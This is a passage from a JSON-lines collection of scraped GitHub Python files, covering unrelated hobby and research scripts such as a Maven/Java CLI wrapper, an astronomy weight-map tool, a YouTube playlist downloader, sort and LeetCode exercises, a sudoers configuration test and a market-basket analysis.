OF MENU DRIVEN CODE-----\") \r\n","repo_name":"affankhan21/python","sub_path":"menudriven1.py","file_name":"menudriven1.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42147733698","text":"import subprocess, os\r\n\r\n# constants with global scope\r\nINPUT = \"--input\"\r\nOUTPUT = \"--output\"\r\nFILTERS = \"--filters\"\r\nSUPPPLEMENTS = \"--supplements\"\r\nJAR_DIRECTORY = \"target\"\r\nJAR_NAME = \"report-engine.jar\"\r\n\r\ndef build_jar():\r\n should_package = input(\"\\nBuild \" + JAR_NAME + \" file from src (Y/N) ? \")\r\n # check if jar is to be built \r\n if len(should_package) != 0 and (should_package[0] == 'Y' or should_package[0] == 'y'): \r\n # define build commands for maven \r\n mvn_cmd = ['mvn', 'clean', 'package']\r\n print(\"\\nBuilding \" + JAR_NAME + \" from src using command:\\n\" + ' '.join(mvn_cmd) + '\\n')\r\n # build jar using maven through an external process spawned from python\r\n mvn_process = subprocess.Popen(mvn_cmd, shell=True)\r\n mvn_process.wait()\r\n return mvn_process.returncode\r\n else:\r\n return None\r\n \r\ndef execute_jar(app_cmd_args):\r\n should_run = input(\"\\nRun \" + JAR_NAME + \" file from target (Y/N) ? \")\r\n # check if jar is to be run \r\n if len(should_run) != 0 and (should_run[0] == 'Y' or should_run[0] == 'y'): \r\n # form jar file path based on underlying os\r\n jar_location = os.path.join(JAR_DIRECTORY,JAR_NAME)\r\n # define commands for executing .jar file using java\r\n jar_cmd = ['java', '-jar', jar_location]\r\n # parse arguments\r\n for key,value in app_cmd_args.items():\r\n jar_cmd.append(key + '=' + value)\r\n print(\"\\nExecuting \" + JAR_NAME + \" using command: \\n\" + ' '.join(jar_cmd) + '\\n')\r\n # execute jar using java through an external process spawned from python\r\n jar_process = subprocess.Popen(jar_cmd, shell=True)\r\n jar_process.wait()\r\n return jar_process.returncode;\r\n else:\r\n return None\r\n \r\ndef main():\r\n # input from user through stdin\r\n input_path = input(\"Enter the directory path containing profiles to be parsed (--input): \")\r\n output_path = input(\"Enter the directory path where reports will be dumped (--output): \")\r\n filters = input(\"Profile properties for which filtered reports will be generated (--filters optional): \")\r\n supplements = input(\"Profile properties for which supplementary reports will be generated (--supplements optional): \")\r\n \r\n # format arguments\r\n app_cmd_args = dict([(INPUT,input_path)])\r\n \r\n # validate optional arguments\r\n if len(filters) != 0:\r\n app_cmd_args[FILTERS] = filters\r\n if len(output_path) != 0:\r\n app_cmd_args[OUTPUT] = output_path\r\n if len(supplements) != 0:\r\n app_cmd_args[SUPPPLEMENTS] = supplements\r\n \r\n # validate arguments\r\n if len(app_cmd_args.get(INPUT)) == 0:\r\n print(\"\\n\" + INPUT + \" option is mandatory! Please re-run the cli_wrapper.py script\\n\")\r\n else :\r\n # argument validated successfully\r\n mvn_exit_code = build_jar()\r\n # execute .jar file only if maven build is successful\r\n print(\"\\nMaven exit code: \" + str(mvn_exit_code)) \r\n if mvn_exit_code == 0 or mvn_exit_code == None:\r\n jar_exit_code = execute_jar(app_cmd_args)\r\n print(\"\\nJava exit code: \" + str(jar_exit_code))\r\n print('\\nReport engine terminated!')\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"anirbandas18/report-engine","sub_path":"cli_wrapper.py","file_name":"cli_wrapper.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21151436352","text":"#! /usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom scipy import stats,ndimage\nfrom astropy.coordinates import SkyCoord\nfrom scipy.interpolate import interp2d, RectBivariateSpline, interpn, griddata\nfrom argparse import ArgumentParser\n\ndef sigmoid(x, ref_x):\n return 1. / (1. + np.exp(-(x-ref_x)))\n\ndef create_sigweight(infits):\n\n img_fits = fits.open(infits)\n img_shape = img_fits[0].data.shape\n valid_mask = np.isfinite(img_fits[0].data)\n step = 50\n y, x = np.indices([s//step + 2 for s in img_fits[0].data.shape], dtype=np.int32)\n\n x_grid = np.clip(x*step, None, img_fits[0].data.shape[1]-1)\n y_grid = np.clip(y*step, None, img_fits[0].data.shape[0]-1)\n\n print('Image shape: ', img_shape)\n print('Max Indicies:', np.max(y_grid), np.max(x_grid))\n print('Min Indicies:', np.min(y_grid), np.min(x_grid))\n\n\n keep = valid_mask[y_grid.flatten(), x_grid.flatten()].reshape(y_grid.shape)\n # keep = np.ones_like(y_sparse)\n \n x_valid = x_grid[keep]\n y_valid = y_grid[keep]\n\n\n wcs = WCS(img_fits[0].header)\n\n sky_pos_grid = wcs.all_pix2world(x_grid, y_grid, 0)\n sky_pos = wcs.all_pix2world(x_valid, y_valid, 0)\n\n max_y = np.max(sky_pos[1])\n min_y = np.min(sky_pos[1])\n\n mask = sky_pos[1] > (max_y - 10)\n\n points = [(x_grid, y_grid, sky_pos_grid), (x_valid, y_valid, sky_pos)]\n\n for (xp, yp, sp) in points:\n\n print('Plotting sky_pos sigma')\n sig_col = np.max(\n (sigmoid(sp[1], max_y-4),\n 1-sigmoid(sp[1], min_y+4)),\n axis=0\n ).astype(np.float16)\n print('Finished sigmoid')\n print('Finished')\n\n sp = sky_pos_grid\n xp = np.array(x_grid).astype(np.int32)\n yp = np.array(y_grid).astype(np.int32)\n\n sig_col = np.max(\n (sigmoid(sp[1], max_y-4),\n 1-sigmoid(sp[1], min_y+4)),\n axis=0\n ).astype(np.float16)\n\n\n print(xp.shape, yp.shape, sig_col.shape)\n\n x_lin = np.arange(img_shape[1], dtype=np.int32)\n y_lin = np.arange(img_shape[0], dtype=np.int32)\n\n xx, yy = np.meshgrid(x_lin, y_lin)\n\n print(xx.shape, xx.dtype)\n\n stripes = 200\n strides = img_shape[1] // stripes\n\n sp = sky_pos_grid\n xp = np.array(x_grid).astype(np.int32)\n yp = np.array(y_grid).astype(np.int32)\n\n sig_col = np.max(\n (sigmoid(sp[1], max_y-4),\n 1-sigmoid(sp[1], min_y+4)),\n axis=0\n ).astype(np.float16)\n\n results = []\n i=0\n while i < (img_shape[1]):\n x_lin = np.arange(img_shape[0], dtype=np.int32)\n maxy= min((i+strides),img_shape[1])\n y_lin = np.arange(\n i,maxy,\n dtype=np.int32)\n print(x_lin.max(), y_lin.max())\n yy, xx = np.meshgrid(y_lin, x_lin)\n\n\n print('interpolating')\n d = griddata(\n (xp.flatten(), yp.flatten()),\n sig_col.flatten(),\n (yy, xx),\n ).astype(np.float32)\n print(xx.shape, xx.dtype, d.dtype)\n\n results.append(d)\n if i+strides >= img_shape[1]:\n i = img_shape[1]\n else:\n i+=strides\n\n\n dd = np.hstack(results)\n\n dd[~valid_mask] = np.nan\n\n print(dd.shape, dd.dtype)\n\n\n\n\n ddd=1-dd\n\n return dd, ddd\n\ndef create_weightmap(sigmoidweight,rms):\n\n rms_fits = fits.open(rms)\n valid_mask = np.isfinite(rms_fits[0].data)\n imshape_zeros = np.zeros(valid_mask.shape)\n imshape_zeros[valid_mask] = 1.\n\n if args.do_mask is True: \n dist_to_edge = ndimage.distance_transform_edt(imshape_zeros,sampling=[1000,1000])\n edgemask = dist_to_edge <= np.nanmax(dist_to_edge)/5\n\n\n lowercut = np.nanquantile(rms_fits[0].data, 0.45)\n uppercut = np.nanquantile(rms_fits[0].data,0.95)\n rms_mask = rms_fits[0].data <= lowercut\n rms_mask2 = rms_fits[0].data >= uppercut\n\n combined_rms = np.logical_or(rms_mask,rms_mask2)\n combined_mask = np.logical_and(combined_rms,edgemask)\n rms_fits[0].data[combined_mask] = np.nan \n \n \n weightmap = sigmoidweight * (1/(rms_fits[0].data**2))\n\n return weightmap\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\"create a weighting for a drift night based on a sigmoid weighting, will output the fits image for weighting that should be multiplied by the rms/weights \"\n )\n parser.add_argument(\n \"infits\",\n help=\"The input image to use for pixels and sky wcs\",\n )\n parser.add_argument(\n \"rmsfits\",\n help=\"RMS map to use the sigmoid weighting on and produce final weightmap thats input for swarp\"\n )\n parser.add_argument(\n \"outfits\",\n help=\"Outfile to save the map to\"\n )\n parser.add_argument(\n \"--mask\",\n action=\"store_true\",\n default=False,\n dest=\"do_mask\",\n help=\"Add a mask for the edges of the weightmap\"\n )\n args = parser.parse_args()\n dd, ddd = create_sigweight(args.infits)\n\n fits.writeto(args.outfits,ddd,overwrite=True)\n \n weightmap = create_weightmap(ddd, args.rmsfits)\n fits.writeto(args.outfits, weightmap, overwrite=True)\n","repo_name":"GLEAM-X/GLEAM-X-pipeline","sub_path":"gleam_x/bin/sigmoid_edge_weight.py","file_name":"sigmoid_edge_weight.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74910182246","text":"# Bubble sort \n\ndef bubbleSort(array):\n \n for i in range(len(array)):\n\n for j in range(0, len(array) - i - 1):\n\n # Using < to sort in descending order\n # commited error, now sorting in descending order instead of ascending order\n if array[j] < array[j + 1]:\n\n temp = array[j]\n array[j] = array[j+1]\n array[j+1] = temp\n\n\nprint (\"\\033[1;33;40m.. • ☆ . ° .• °:. *₊° .☆. . • ☆ . ° .• °:. *₊° .☆.. • ☆ .\\033[1;33;40m\\n\") \ndata = [ 2, 27, 40, 7, 13, 66, 1, 31, 41, 24 ] \nbubbleSort(data)\nprint(' \\033[1;37;40mSorted Array in Descending Order using Bubble Sort:\\033[1;37;40m\\n')\nprint(\" \\033[0;37;41m\",data,\"\\033[0;37;40m\\n\")\n","repo_name":"jezelldomer/Array-Sorting","sub_path":"bubble-sort.py","file_name":"bubble-sort.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30147560374","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom __future__ import unicode_literals\nimport tkinter as tk\nimport youtube_dl\n\nroot= tk.Tk()\nroot.title('Playlist Downloader')\ncanvas1 = tk.Canvas(root, width = 400, height = 300)\ncanvas1.pack()\n\nentry1 = tk.Entry (root) \ncanvas1.create_window(200, 140, window=entry1)\n\ndef getSquareRoot (): \n x1 = entry1.get()\n \n def my_hook(d):\n if d['status'] == 'finished':\n print('Done downloading, now converting ...')\n\n ydl_opts = {\n 'format': 'bestaudio/best', \n 'outtmpl': '%(title)s.%(ext)s', \n 'noplaylist' : False, \n 'progress_hooks': [my_hook], \n 'audiotformat': 'mp3',\n 'preferredquality': '320',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '320',\n }]\n }\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([x1])\n \nbutton1 = tk.Button(text='Download playlist', command=getSquareRoot)\ncanvas1.create_window(200, 180, window=button1)\n\nroot.mainloop()\n\n","repo_name":"haker88/PlaylistDownloader","sub_path":"PlaylistDownloader.py","file_name":"PlaylistDownloader.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15974184344","text":"#!/usr/bin/env python\n\n# Build in\nfrom pathlib import Path\n\n# ML\nimport torch\n\n# Config and loggers\nimport hydra\nfrom omegaconf import DictConfig\nfrom hydra.utils import instantiate\nimport wandb\n\n# Own\nfrom helpers.utils import Scaler\n\n\n@hydra.main(\n version_base=None,\n config_path=(Path.cwd() / \"config\").as_posix(),\n config_name=\"config\",\n)\ndef main(cfg: DictConfig) -> None:\n # Initiate logger\n init_plot(cfg.log.style)\n cfg.log.level = logging.getLevelName(cfg.log.level)\n cfg.log.global_level = logging.getLevelName(cfg.log.global_level)\n logger = logging.getLogger(\"Sweeps\")\n logger.info(\"Sweeps logs will be saved at %s\", Path.cwd())\n # Choosing a device\n if cfg.device == \"auto\":\n cfg.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n # Training\n # Initiate dataset\n train_dataset = instantiate(cfg.dataset, mode=\"train\")\n val_dataset = instantiate(cfg.dataset, mode=\"val\")\n # Initiate the scaler\n scaler = Scaler(*train_dataset.get_scaler_info)\n # Initiate the model\n model = instantiate(cfg.model, degrees=train_dataset.degrees)\n # Initiate the estimator model\n e_model = instantiate(\n cfg.estimator,\n embedding_dict={\n \"time\": 24 * 7 * 12,\n \"day\": 7,\n \"node\": train_dataset.node,\n \"degree\": train_dataset.degrees_max,\n },\n degrees=train_dataset.degrees,\n )\n # Setup a logger\n wandb.init(\n project=cfg.log.project,\n settings=wandb.Settings(start_method=\"thread\"),\n )\n # Initiate trainer\n trainer = instantiate(\n cfg.trainer, model=model, e_model=e_model, scaler=scaler\n )\n # Train\n trainer.train(train_dataset.get_data_loader(), val_dataset.get_data_loader())\n\n\nif __name__ == \"__main__\":\n # run sweep with wandb sweep ./config/sweepers/[YOUR SWEEP OF CHOICE]\n # Then follow the wandb instructions\n main()\n","repo_name":"Mouradost/STGM","sub_path":"src/sweeps.py","file_name":"sweeps.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"53"} +{"seq_id":"16400040887","text":"from collections import defaultdict\ndata_stream = \"\"\nwith open('inp1.txt', 'r') as file:\n data = file.readlines()\n data_stream = data[0].strip()\nseen = defaultdict(int)\nunique_chars = 0\nSTREAM_LENGTH = 14 # 4\nfor i, c in enumerate(data_stream):\n if unique_chars == STREAM_LENGTH:\n print(i)\n break\n if i >= STREAM_LENGTH:\n removed_char = data_stream[i-STREAM_LENGTH]\n seen[removed_char] -= 1\n if seen[removed_char] == 0:\n unique_chars -= 1\n if seen[c] == 0:\n unique_chars += 1\n seen[c] += 1","repo_name":"ayubharis/advent-of-code-2022","sub_path":"06/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22077059928","text":"########################################################################\r\n# ASSOCATING RULES PROJECT WITH online_retail_2 DATA\r\n########################################################################\r\n\r\n##################################\r\n# Preparing Data\r\n##################################\r\n# !pip install mlxtend\r\nimport pandas as pd\r\npd.set_option('display.max_columns', None)\r\n# pd.set_option('display.max_rows', None)\r\npd.set_option('display.width', 500)\r\nimport datetime as dt\r\n# çıktının tek bir satırda olmasını sağlar.\r\npd.set_option('display.expand_frame_repr', False)\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\n\r\ndf_ = pd.read_excel(\"datasets/online_retail_II.xlsx\",\r\n sheet_name=\"Year 2010-2011\")\r\n\r\ndf = df_.copy()\r\n\r\ndf.head()\r\ndf.info()\r\ndf.isnull().sum()\r\n\r\n\r\ndf = df.dropna()\r\n\r\ndf = df[df[\"StockCode\"] != \"POST\"]\r\n\r\n# If Invoice contains C, it means it has been canceled\r\ndf = df[~df[\"Invoice\"].str.contains(\"C\",na=False)]\r\n\r\ndf = df[df[\"Price\"] > 0]\r\ndf = df[df[\"Quantity\"] > 0]\r\n\r\ndef outlier_thresholds(dataframe, variable):\r\n quartile1 = dataframe[variable].quantile(0.01)\r\n quartile3 = dataframe[variable].quantile(0.99)\r\n interquantile_range = quartile3 - quartile1\r\n up_limit = quartile3 + 1.5 * interquantile_range\r\n low_limit = quartile1 - 1.5 * interquantile_range\r\n return low_limit, up_limit\r\n\r\n def replace_with_thresholds(dataframe, variable):\r\n low_limit, up_limit = outlier_thresholds(dataframe, variable)\r\n # dataframe.loc[(dataframe[variable] < low_limit), variable] = low_limit\r\n dataframe.loc[(dataframe[variable] > up_limit), variable] = up_limit\r\n\r\n\r\n\r\nreplace_with_thresholds(df, \"Price\")\r\nreplace_with_thresholds(df, \"Quantity\")\r\n\r\n######################\r\n# Preparing Data for ARL\r\n######################\r\n\r\ndf_de = df[df[\"Country\"] == \"Germany\"]\r\n\r\ndef create_invoice_product_df(dataframe, id=False):\r\n if id:\r\n return dataframe.groupby([\"Invoice\", \"StockCode\"])[\"Quantity\"].sum().unstack().fillna(0).applymap(lambda x:1 if x>0 else 0)\r\n else:\r\n return dataframe.groupby([\"Invoice\", \"Description\"])[\"Quantity\"].sum().unstack().fillna(0).applymap(lambda x:1 if x>0 else 0)\r\n\r\nfr_inv_pro_df = create_invoice_product_df(df_de, id=True)\r\n\r\ndef check_id(dataframe, stock_code):\r\n product_name = dataframe[dataframe[\"StockCode\"] == stock_code][[\"Description\"]].values[0].tolist()\r\n print(product_name)\r\n\r\nfrequent_itemsets = apriori(fr_inv_pro_df,\r\n min_support=0.01,\r\n use_colnames=True)\r\n\r\nfrequent_itemsets.sort_values(\"support\",ascending=False)\r\n\r\nrules = association_rules(frequent_itemsets,\r\n metric=\"support\",\r\n min_threshold=0.01)\r\n\r\nsorted_rules = rules.sort_values(\"lift\", ascending=False)\r\n\r\ndef create_rules(dataframe):\r\n frequent_itemsets = apriori(dataframe, min_support=0.01, use_colnames=True)\r\n rules = association_rules(frequent_itemsets,\r\n metric=\"support\",\r\n min_threshold=0.01,)\r\n sorted_rules = rules.sort_values(\"lift\",ascending=False)\r\n\r\n############################\r\n# Creating arl_rules function\r\n############################\r\n\r\nproduct_id = 22629\r\nrecommendation_list = []\r\n\r\nfor i, product in enumerate(sorted_rules[\"antecedents\"]):\r\n for j in list(product):\r\n if j == product_id:\r\n recommendation_list.append(list(sorted_rules.iloc[i][\"consequents\"])[0])\r\n\r\n\r\ndef arl_recommender(sorted_dataframe, product_id, rec_count=1):\r\n recommendation_list = []\r\n for i, product in enumerate(sorted_dataframe[\"antecedents\"]):\r\n for j in list(product):\r\n if j == product_id:\r\n recommendation_list.append(list(sorted_dataframe.iloc[i][\"consequents\"])[0])\r\n\r\n return recommendation_list[0:rec_count]\r\n\r\n\r\narl_recommender(sorted_rules, 22629, 7)\r\narl_recommender(sorted_rules, 22328, 3)\r\narl_recommender(sorted_rules, 22961, 2)","repo_name":"eemredenizz/Assocating-Rules-Learning-With-Online-Retail-II-Data","sub_path":"assocating_rules_with_online_retail_II_data.py","file_name":"assocating_rules_with_online_retail_II_data.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22815776965","text":"import os, datetime, serial, csv, time, random, signal\nimport io\nimport serial.tools.list_ports\nfrom serial import Serial\n\ndebug_mode = False\n\nif debug_mode:\n print(\"STARTING IN DEBUG MODE\")\n\nports = serial.tools.list_ports.comports()\nall_ports = []\n\nfor port, desc, hwid in sorted(ports):\n print(\"{}: {}\".format(port, desc))\n all_ports.append(\"{}: {}\".format(port, desc))\n\nprint(all_ports)\nserial_port = \"\"\nport_found = False\nfor p in all_ports:\n curr = p.lower()\n if 'usb serial' in curr:\n serial_port = p.split(':')[0]\n port_found = True\n print(\"Found STM32 device on serial port\")\n\nif not port_found and not debug_mode:\n print(\"Arduino not found! Ending Program\")\n # os.kill(os.getpid(), signal.SIGTERM)\n exit()\n\nelif not debug_mode:\n ser = Serial(serial_port, 9600, timeout=0)\n sio = io.TextIOWrapper(io.BufferedRWPair(ser, ser))\n\n# print(\"------------------SYNTAX------------------\")\n# print(\"|Type v_.__ to set voltage output of DAC|\")\n# print(\"|Type i_.__ to set current output of DAC|\")\n# print(\"------------------------------------------\")\n\nwhile port_found or debug_mode:\n setpoint = str(input(\"Set Setpoint: \"))\n # setpoint = int(setpoint * 1e5)\n print(setpoint)\n if setpoint == 'x':\n break\n if not debug_mode:\n sio.write(str(setpoint + 'f'))\n sio.flush()\n time.sleep(0.01)\n print(\"Data\", sio.read())\n sio.flush()\nif not debug_mode:\n ser.close()","repo_name":"josephborromeo/CellTester","sub_path":"Python/voltage_setter_test.py","file_name":"voltage_setter_test.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12541327456","text":"import os\n\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')\n\n\ndef test_default_packages(host):\n p = host.package('sudo')\n assert p.is_installed\n\n\ndef test_default_sudoers(host):\n f = host.file('/etc/sudoers')\n\n assert f.user == 'root'\n assert f.group == 'root'\n assert f.mode == 0o440\n\n defaults = [\n '!visiblepw',\n 'always_set_home',\n 'match_group_by_gid',\n 'always_query_group_plugin',\n 'env_reset',\n 'env_keep = \"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\"',\n 'env_keep += \"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\"',\n 'env_keep += \"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\"', # noqa E501\n 'env_keep += \"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\"',\n 'env_keep += \"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\"', # noqa E501\n 'secure_path = /sbin:/bin:/usr/sbin:/usr/bin'\n ]\n for d in defaults:\n assert f.contains('Defaults ' + d)\n\n assert f.contains('root ALL=(ALL:ALL) ALL')\n\n if host.system_info.distribution == 'debian':\n assert f.contains('%sudo ALL=(ALL:ALL) ALL')\n else:\n assert f.contains('%wheel ALL=(ALL:ALL) ALL')\n\n assert f.contains('#includedir /etc/sudoers.d')\n","repo_name":"crgwilson/ansible-role-sudo","sub_path":"molecule/default/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12969540417","text":"from clsLocation import Location\nfrom clsCheckers import Checkers\n\nturn = input(\"What is your move? \")\nturnList = turn.split(\", \")\n\ncurrentRow = int(turnList[0])\ncurrentColumn = int(turnList[1])\nopponentNumber = int(turnList[2])\n\nchecker = Checkers((Location(currentRow, currentColumn)))\n\nfor count in range(3, ((opponentNumber * 2) + 3), 2):\n row = int(turnList[count])\n column = int(turnList[count+1])\n checker.addOpponentLocation(Location(row, column))\n\nchecker.jump()\nprint('%d%s' % (checker.jumps, \", KING\" if checker.king else \"\"))\n\n\n\n\n\n","repo_name":"matthewru/PythonLearning","sub_path":"ACSL/SampleProblems/Contest_2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72267310247","text":"import re\nfrom glob import glob\n\nimport numpy as np\nimport pandas as pd\n\n\ndef logfile_to_time_df(logfile, groupfunc=None):\n \"\"\"\n Given logfile, return training times\n average_results: if True, return the average across all partitions/runs\n\n USAGE:\n logfile = \"multitask_sequential_crnn_v3_1.out\"\n df = logfile_to_time_df(logfile)\n df.to_csv(logfile + \"_time.csv\")\n\n \"\"\"\n\n # Final results (to turn into dataframe)\n final_results = []\n\n # Read logfile\n with open(logfile, \"r\") as file:\n data_raw = file.read()\n\n # Split by partitions and runs\n data = data_raw.split(\"Current partition:\")[1:]\n assert len(data) == 10, \"Error in [partition] extraction\"\n data = [i.split(\"Run # \")[1:] for i in data]\n assert pd.Series([len(i) == 10 for i in data]).all(), \"Error in [run] extraction\"\n\n # Main string parsing loop\n for partition in range(10):\n for run in range(10):\n\n # Extract train data and evaluate_best_model data\n epoch_data = data[partition][run]\n epoch_data = epoch_data.split(\"Evaluating the best model\")\n assert len(epoch_data) == 3, \"Error in [best model evaluation] extraction\"\n evaluation_data = epoch_data[2]\n train_data = epoch_data[0]\n train_data = train_data.split(\"Epoch \")[1:]\n\n # Test epoch extraction validity\n epoch_nums = [i.split(\"\\n\")[0] for i in train_data]\n epoch_n = [int(i.split(\"/\")[0]) for i in epoch_nums]\n epoch_d = [int(i.split(\"/\")[1]) for i in epoch_nums]\n assert all(\n j == i + 1 for i, j in zip(epoch_n, epoch_n[1:])\n ), \"Error in [epoch] extraction\"\n assert len(set(epoch_d)) == 1, \"Error in [epoch] extraction\"\n\n # Extract relevant data\n epoch_times = []\n val_times = []\n for epoch in train_data:\n\n # Get epoch Time\n epoch_time = [i for i in epoch.split(\"\\n\") if \"loss: \" in i]\n assert len(epoch_time) == 1, \"[loss: ] appeared more than once\"\n epoch_time = epoch_time[0].split(\" - \")[1]\n epoch_time = re.split(\"(\\d+)\", epoch_time)[1:] # Split by digits\n assert (\n len(epoch_time) == 2 and epoch_time[1] == \"s\"\n ), \"Error in [epochtime]\"\n epoch_time = int(epoch_time[0])\n epoch_times.append(epoch_time)\n\n # Get validation time\n val_time = [i for i in epoch.split(\"\\n\") if \"Validation time: \" in i]\n assert len(val_time) == 1, \"Error in [validation time] extraction\"\n val_time = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", val_time[0])\n assert len(val_time) == 1, \"Error in [validation time] extraction\"\n val_times.append(float(val_time[0]))\n\n # Get best models\n if \"Saving best model at epoch\" in epoch:\n best_model_at_epoch = int(epoch.split(\"\\n\")[0].split(\"/\")[0])\n\n # Extract final evaluation time\n final_val = [\n i for i in evaluation_data.split(\"\\n\") if \"Validation time: \" in i\n ]\n assert len(final_val) == 1, \"Error in [final val time] extraction\"\n final_val = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", final_val[0])\n assert len(final_val) == 1, \"Error in [final val time] extraction\"\n\n # Sanity checks\n assert len(epoch_times) == len(val_times), \"Epoch times != validation times\"\n assert len(epoch_nums) == len(epoch_times), \"Epoch times != num epochs\"\n\n # Calculate all relevant times\n r = {}\n r[\"partition\"] = partition\n r[\"run\"] = run\n r[\"avg_time_per_epoch\"] = np.mean(epoch_times)\n r[\"number_of_epoch_at_best_model\"] = best_model_at_epoch\n r[\"number_of_epoch_at_finish\"] = len(epoch_nums)\n r[\"total_train_time_at_best_model\"] = np.sum(\n epoch_times[:best_model_at_epoch]\n )\n r[\"total_train_time_at_finish\"] = np.sum(epoch_times)\n r[\"total_val_time_at_best_model\"] = np.sum(val_times[:best_model_at_epoch])\n r[\"total_val_time_at_finish\"] = np.sum(val_times)\n r[\"total_time_at_best_model\"] = (\n r[\"total_train_time_at_best_model\"] + r[\"total_val_time_at_best_model\"]\n )\n r[\"total_time_at_finish\"] = (\n r[\"total_train_time_at_finish\"] + r[\"total_val_time_at_finish\"]\n )\n r[\"final_evaluation_time\"] = float(final_val[0])\n\n final_results.append(r)\n\n final_results = pd.DataFrame(final_results)\n if groupfunc:\n final_results[\"temp\"] = 1\n if groupfunc == \"mean\":\n return final_results.groupby(\"temp\").mean().reset_index(drop=True)\n elif groupfunc == \"sum\":\n return final_results.groupby(\"temp\").sum().reset_index(drop=True)\n else:\n raise Exception(\"groupby: 'mean' or 'sum'\")\n return final_results\n","repo_name":"lhmtriet/DeepCVA","sub_path":"helpers/extract_logfile_time.py","file_name":"extract_logfile_time.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"3126488853","text":"# -*- coding: utf-8 -*-\n# @File : move_zeroes.py\n# @Author: clelandgt@163.com\n# @Date : 2020-07-01\n# @Desc :\nfrom typing import List\nfrom copy import copy, deepcopy\n\n\nclass Solution1:\n def moveZeroes(self, nums: List[int]) -> None:\n nums.sort(key=lambda x: 1 if x == 0 else 0)\n\n\nclass Solution2:\n \"\"\"双指针 正向\n 时间复杂度: O(n)\n 空间复杂度: O(1)\n \"\"\"\n def moveZeroes(self, nums: List[int]) -> None:\n not_null_index = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[not_null_index], nums[i] = nums[i], nums[not_null_index]\n not_null_index += 1\n\n\nclass Solution3:\n \"\"\"双指针 逆向 (错误),因为要保持非0元素的位置不变\n 时间复杂度: O(n)\n 空间复杂度: O(1)\n \"\"\"\n def moveZeroes(self, nums: List[int]) -> None:\n index, size, zero = 0, len(nums), len(nums)\n while index < zero:\n if nums[index] == 0:\n zero -= 1\n nums[index], nums[zero] = nums[zero], nums[index]\n index += 1\n return nums\n\n\ndef main():\n test_cases = [\n [0, 1, 0, 3, 12]\n ]\n\n print('Solution1')\n s1 = Solution1()\n for test_case in test_cases:\n test_case = deepcopy(test_case)\n s1.moveZeroes(test_case)\n print(test_case)\n\n print('Solution2')\n s2 = Solution2()\n for test_case in test_cases:\n test_case = deepcopy(test_case)\n s2.moveZeroes(test_case)\n print(test_case)\n\n print('Solution3')\n s3 = Solution3()\n for test_case in test_cases:\n test_case = deepcopy(test_case)\n s3.moveZeroes(test_case)\n print(test_case)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"clelandgt/arithmetic","sub_path":"leetcode/283/move_zeroes.py","file_name":"move_zeroes.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38821809696","text":"\nfrom torchvision import transforms, datasets\nimport torch\n\ndef get_dataloaders():\n ALL_DATA_DIR = '../datasets/01_FER2013_datasets/'\n train_dir = ALL_DATA_DIR + 'train'\n test_dir = ALL_DATA_DIR + 'test'\n batch_size = 128\n IMG_SIZE= 48# 300 # 80 #\n train_transforms = transforms.Compose(\n [\n transforms.Resize((IMG_SIZE,IMG_SIZE)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]\n )\n\n test_transforms = transforms.Compose(\n [\n transforms.Resize((IMG_SIZE,IMG_SIZE)),\n transforms.Grayscale(3),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 